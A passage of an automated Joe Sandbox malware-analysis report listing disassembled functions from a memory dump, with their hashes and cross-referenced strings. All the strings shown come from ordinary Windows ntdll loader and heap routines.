• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 2c4780d358dcb4b1d214ec9e88d0b2780c07561bc62adfd946dc89bbf7924bfd
                    • Instruction ID: 1aef35acdfd8f12723120afe547df408dc8bd5a11498ecb461e691889f987421
                    • Opcode Fuzzy Hash: 2c4780d358dcb4b1d214ec9e88d0b2780c07561bc62adfd946dc89bbf7924bfd
                    • Instruction Fuzzy Hash: 2D310B72900255AEEB129B14C888F5677EBFB0377CF0A412EDD0867663DBA4DD8087D5
                    Strings
                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 213DA992
                    • TG4!, xrefs: 21392462
                    • minkernel\ntdll\ldrinit.c, xrefs: 213DA9A2
                    • LdrpDynamicShimModule, xrefs: 213DA998
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG4!$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-4157384740
                    • Opcode ID: 5a512862fa1312be989e0c083b5e4a9edf1a13d32b288a7ce09f621a04bc2ae4
                    • Instruction ID: 0a37ddc4a4f6329193038e38b2fe67d2909c407a82b895ea421cbe3c1b2ef8e4
                    • Opcode Fuzzy Hash: 5a512862fa1312be989e0c083b5e4a9edf1a13d32b288a7ce09f621a04bc2ae4
                    • Instruction Fuzzy Hash: AB317CB7640286EFE7118F69C980E9A77FBFB85B0CF11005DF9196B261CB749981CB80
                    Strings
                    • HEAP: , xrefs: 21383264
                    • HEAP[%wZ]: , xrefs: 21383255
                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2138327D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                    • API String ID: 0-617086771
                    • Opcode ID: eb6781fd774acf2a8027bf87f5bb04ca1f6e08546c6184be489c9a9e7b461be1
                    • Instruction ID: e717e5a5357b5edf771ed51b2833b789a994230d2044dac2b7d892a046a4d0ec
                    • Opcode Fuzzy Hash: eb6781fd774acf2a8027bf87f5bb04ca1f6e08546c6184be489c9a9e7b461be1
                    • Instruction Fuzzy Hash: 9092BC70A042499FEB15CF68C440BAEBBF6FF49308F1580ADE85AAB391D735A945CF50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-4253913091
                    • Opcode ID: 3f7ae0bf5d721a2e510585589350f2674860396be3d6117386620351111ff7e5
                    • Instruction ID: 32d849bac6bab482b7753d6220c39171c114d74512879bfd5cad07497e95caf9
                    • Opcode Fuzzy Hash: 3f7ae0bf5d721a2e510585589350f2674860396be3d6117386620351111ff7e5
                    • Instruction Fuzzy Hash: 95F19F32A00606DFEB15CF68C490F6ABBFAFF45708F114269E5169B391D734EA81CB90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: $@
                    • API String ID: 0-1077428164
                    • Opcode ID: 90b5717c4afe4dea53675e8e0feabda14dd445d41be176f6b565e89420473278
                    • Instruction ID: 40543037a8029e220903e796ef7c70ac79bd10834152cefa1765b9fd41c5cf14
                    • Opcode Fuzzy Hash: 90b5717c4afe4dea53675e8e0feabda14dd445d41be176f6b565e89420473278
                    • Instruction Fuzzy Hash: 64C290726183459FE725CF24C841B9BBBEABF89758F04892DF989C7241D734D904CB92
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: FilterFullPath$UseFilter$\??\
                    • API String ID: 0-2779062949
                    • Opcode ID: 7f0ece65410e071833cab2f89422a462f9779a50e9284df93713cc7aaf8588a8
                    • Instruction ID: 374a51fc100d95f3aea9464be8d809815e0d5a44c685ad9fe217d60d505f0319
                    • Opcode Fuzzy Hash: 7f0ece65410e071833cab2f89422a462f9779a50e9284df93713cc7aaf8588a8
                    • Instruction Fuzzy Hash: 74A16B7191122D9BDB21DF24CC88B9AB7BAFF45B18F1041E9E908A7250E7359F84CF54
                    Strings
                    • Failed to allocated memory for shimmed module list, xrefs: 213DA10F
                    • minkernel\ntdll\ldrinit.c, xrefs: 213DA121
                    • LdrpCheckModule, xrefs: 213DA117
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-161242083
                    • Opcode ID: e99e4c2997a77477edb7d9ecf2d21d5cf4886f836c2759e2f4f1153b528fd3f9
                    • Instruction ID: 24433b22f54606d175f3c4d81d866e5a2dd94f22da06d49f5c76d20a1a783b43
                    • Opcode Fuzzy Hash: e99e4c2997a77477edb7d9ecf2d21d5cf4886f836c2759e2f4f1153b528fd3f9
                    • Instruction Fuzzy Hash: 6C71B0B2A00245DFDF05DF68C980AAEB7FAFB4470CF14446DD516AB251E738AA41CB90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: d62eb83dc99c085692c3cd2f8619586b4a8796bef7d39b51245e7393b7f5d995
                    • Instruction ID: f3a24d4b54ea7e2b625a10c75cb852e0a6eb2163d3a5eef8b1d17cf549208509
                    • Opcode Fuzzy Hash: d62eb83dc99c085692c3cd2f8619586b4a8796bef7d39b51245e7393b7f5d995
                    • Instruction Fuzzy Hash: 3761EF726003469FE719CF28C480B5ABBF6FF45708F11866DE4598F296C770E981CB90
                    Strings
                    • LdrpInitializePerUserWindowsDirectory, xrefs: 213E82DE
                    • minkernel\ntdll\ldrinit.c, xrefs: 213E82E8
                    • Failed to reallocate the system dirs string !, xrefs: 213E82D7
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-1783798831
                    • Opcode ID: bad33ee87f15b8a4b9a2abedda58b1bdd38a90de74622ac446704cbd491ed51c
                    • Instruction ID: 336316aefb732540304bd3cc4df66f81d4c6c54975fb9c0e6c511bab52b530b6
                    • Opcode Fuzzy Hash: bad33ee87f15b8a4b9a2abedda58b1bdd38a90de74622ac446704cbd491ed51c
                    • Instruction Fuzzy Hash: 5D41EEB1584355AFC711DF68C984B4B7BEAEF49B5CF00492AF94CA3261EB79D800CB91
                    Strings
                    • PreferredUILanguages, xrefs: 2142C212
                    • @, xrefs: 2142C1F1
                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2142C1C5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                    • API String ID: 0-2968386058
                    • Opcode ID: 539ea54e244284e854c5bb36a6d9392c7cefc5a18508eb6a42753dc6ba3f4126
                    • Instruction ID: 4c481eee38782ffc19a4acb637eda78c21c6dfd845c3e8c8162e47a10a373290
                    • Opcode Fuzzy Hash: 539ea54e244284e854c5bb36a6d9392c7cefc5a18508eb6a42753dc6ba3f4126
                    • Instruction Fuzzy Hash: 92415072E0060DAFDB01CBD9CC81FDEBBBDAB16714F10416AE609A7240DB759B858B60
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                    • API String ID: 0-1373925480
                    • Opcode ID: 7d74296e199169768096905b33bab880757fa83a6d56d1f5a024a03bc417d7e4
                    • Instruction ID: 2a82767a5d707b0bd7932e4ff8572ee6e22ba9542762e6cb0f4d2c6d51c3482d
                    • Opcode Fuzzy Hash: 7d74296e199169768096905b33bab880757fa83a6d56d1f5a024a03bc417d7e4
                    • Instruction Fuzzy Hash: 1B410432A042498FEB1ACBEAC844B9DBBB9FF56384F19046DD908EF791D7349901CB51
                    Strings
                    • minkernel\ntdll\ldrredirect.c, xrefs: 213F4899
                    • LdrpCheckRedirection, xrefs: 213F488F
                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 213F4888
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                    • API String ID: 0-3154609507
                    • Opcode ID: 581ef6a674daf3a5a83016648d4dd23b8df9f135918b0e8561c995fdcc357797
                    • Instruction ID: e527b57d157c7dfd3712b9b3d1488d94fac30a5052adf39e09d1967eecb50f16
                    • Opcode Fuzzy Hash: 581ef6a674daf3a5a83016648d4dd23b8df9f135918b0e8561c995fdcc357797
                    • Instruction Fuzzy Hash: 8841CF32A042919FCB11CE68D840E167FEABF8A668F01056DED5897325D732E800CB91
                    Strings
                    • RtlpResUltimateFallbackInfo Exit, xrefs: 2137A309
                    • PS4!, xrefs: 2137A348
                    • RtlpResUltimateFallbackInfo Enter, xrefs: 2137A2FB
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: PS4!$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                    • API String ID: 0-1371353809
                    • Opcode ID: c4541e01439a9de7328e12a9411665c2a4773fe9d915fcabbf798d8f1577f463
                    • Instruction ID: da5adde672679bf5d131838b3a41ad777ae82ff714ee85301b87a339d6b3df1b
                    • Opcode Fuzzy Hash: c4541e01439a9de7328e12a9411665c2a4773fe9d915fcabbf798d8f1577f463
                    • Instruction Fuzzy Hash: 6341B432A04649DFEB05CF69C880B5E7BBAFF45708F1441A9E910DB351E3B9DA41CB50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-2558761708
                    • Opcode ID: 5bf5cf91fa77a8893d5aad4523495990e22ac3aba68160e55997ee5b9aeb431e
                    • Instruction ID: d9a87d884ba31f7ec96defb47f754e6a9acfa143070d90bc0600413cb8e885cf
                    • Opcode Fuzzy Hash: 5bf5cf91fa77a8893d5aad4523495990e22ac3aba68160e55997ee5b9aeb431e
                    • Instruction Fuzzy Hash: 6B11DF333150869FD71ACB28C484F56B7BBEF4172EF158229E40ADB259DB30E841C792
                    Strings
                    • minkernel\ntdll\ldrinit.c, xrefs: 213F2104
                    • LdrpInitializationFailure, xrefs: 213F20FA
                    • Process initialization failed with status 0x%08lx, xrefs: 213F20F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-2986994758
                    • Opcode ID: 3c5847f4cf6c14ee548e3d9a6acb2c54e4c7e74c053a7667a17dd18073942a94
                    • Instruction ID: 6e39131cafd51ab7137a32203b517be85a619db2c76a5cfe0acddf5b43d65f68
                    • Opcode Fuzzy Hash: 3c5847f4cf6c14ee548e3d9a6acb2c54e4c7e74c053a7667a17dd18073942a94
                    • Instruction Fuzzy Hash: 2FF0C8B9640248BFE710DA4DCC52F9A3BAEFB45B5CF100059F60467381D6B4A900C695
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: #%u
                    • API String ID: 48624451-232158463
                    • Opcode ID: 2752be05fda394055be78ad15746ba8a7b733c023f68a067624c48327e68bd51
                    • Instruction ID: 69f457f6d152fc8f6121f36f358ce0da64d98d568d7a90f8942e67b5629f32a1
                    • Opcode Fuzzy Hash: 2752be05fda394055be78ad15746ba8a7b733c023f68a067624c48327e68bd51
                    • Instruction Fuzzy Hash: F1714A72A0114A9FDB05CFA8C990FAEB7FAAF18708F154165E905E7251EB34EE05CB60
                    Strings
                    • LdrResSearchResource Enter, xrefs: 2137AA13
                    • LdrResSearchResource Exit, xrefs: 2137AA25
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                    • API String ID: 0-4066393604
                    • Opcode ID: ad09dd125b9f95a03bb4e56f77856a4da183778c9ea6fa1a7d6655d0302b958f
                    • Instruction ID: 6d04a65151a036aff6632827a69e5ea38c2d014b4b684ca21f515d5fbc8406b7
                    • Opcode Fuzzy Hash: ad09dd125b9f95a03bb4e56f77856a4da183778c9ea6fa1a7d6655d0302b958f
                    • Instruction Fuzzy Hash: 02E18172E04219AFEB12DFA9CD80B9EBBBFBF15358F140469E901E7251D7788942CB50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                    • Instruction ID: 16a20023cf884635a3cd1951e98a4bde34663bb1a9b55d5473dfcc217f29b114
                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                    • Instruction Fuzzy Hash: A6C1DE312443429FE715CF28C840B6BBBE5AFD9758F344A2EF69ACA290D774D505CB82
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Legacy$UEFI
                    • API String ID: 2994545307-634100481
                    • Opcode ID: 9df9ea2d30193f0fb511459a78d3550b5b545476896d5ad1486ba6e44e8bf6c5
                    • Instruction ID: 6c05a3e213d7370fd0f056c182d8dfc9674cc3bfd0ed882fdadc6fd8b10b3ea3
                    • Opcode Fuzzy Hash: 9df9ea2d30193f0fb511459a78d3550b5b545476896d5ad1486ba6e44e8bf6c5
                    • Instruction Fuzzy Hash: C7612B72E003299FDB15CFA88854AADBBFABF48748F20407DE659EB251D731A900CB50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$MUI
                    • API String ID: 0-17815947
                    • Opcode ID: cb2e33c6f77fb56dbf1ab2635e2cf1e3ba5795582da7ab9cd3e84f3937d899a4
                    • Instruction ID: 874e9b9de494800b047a88f6b291695115f58f6071f6d4b741420436d6cb5f5e
                    • Opcode Fuzzy Hash: cb2e33c6f77fb56dbf1ab2635e2cf1e3ba5795582da7ab9cd3e84f3937d899a4
                    • Instruction Fuzzy Hash: EF512871E0021DAEDF01CFA9CC80FEEBBB9EB44798F140529E615B7294E7309A05CB60
                    Strings
                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2137063D
                    • kLsE, xrefs: 21370540
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                    • API String ID: 0-2547482624
                    • Opcode ID: 8386e0dddbc0244f2a4247d8bf57a2819a93633a6bebc5a81aa11262c9fa555f
                    • Instruction ID: 223443e5122e933cd135d7ca61e931b0df31f36e8534ddb703d946c6407e2ea7
                    • Opcode Fuzzy Hash: 8386e0dddbc0244f2a4247d8bf57a2819a93633a6bebc5a81aa11262c9fa555f
                    • Instruction Fuzzy Hash: A251BF71504742CFD314DF68C490697BBF6EF86328F10483EEAA987241E778E646CB92
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: Cleanup Group$Threadpool!
                    • API String ID: 2994545307-4008356553
                    • Opcode ID: b0ca4e8888351fea7a2600984ee79a9b992ba2557e28366c857f4fae1a9e297b
                    • Instruction ID: 31401aac5b035816f0bfed2cb8579e9f03f7c255a00ac1a340c9882b71d41eb9
                    • Opcode Fuzzy Hash: b0ca4e8888351fea7a2600984ee79a9b992ba2557e28366c857f4fae1a9e297b
                    • Instruction Fuzzy Hash: EC01A9B3550744AFD311CF28CE45B16B7E9E7A4729F008939E65CC72A0E738E804CB86
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: MUI
                    • API String ID: 0-1339004836
                    • Opcode ID: 8c10f87794c4768ae8b80272985edc2017dba1114ca145c9c2d5b219dd8088a0
                    • Instruction ID: 06bb2d1bbc1b57d81dc18918e9c9381ab6c25edb8f7e839f0d1e7caa62decf88
                    • Opcode Fuzzy Hash: 8c10f87794c4768ae8b80272985edc2017dba1114ca145c9c2d5b219dd8088a0
                    • Instruction Fuzzy Hash: D1827F75E0021DCFEB15CFA9C880BEDBBB6BF45358F108169E919AB290D7399942CF50
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 4990c33e54f90305e1f6761f0dea68830de61fadb9ed295afa994296729ec697
                    • Instruction ID: 99217b03d49c93f6cde6b152fae0aea37862a4eca726f8c94d1a4336ce319ccb
                    • Opcode Fuzzy Hash: 4990c33e54f90305e1f6761f0dea68830de61fadb9ed295afa994296729ec697
                    • Instruction Fuzzy Hash: 299175B2A01219AFDB11CF99CC85FAE7BBAEF15754F110069F604BB191D775AD00CB90
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
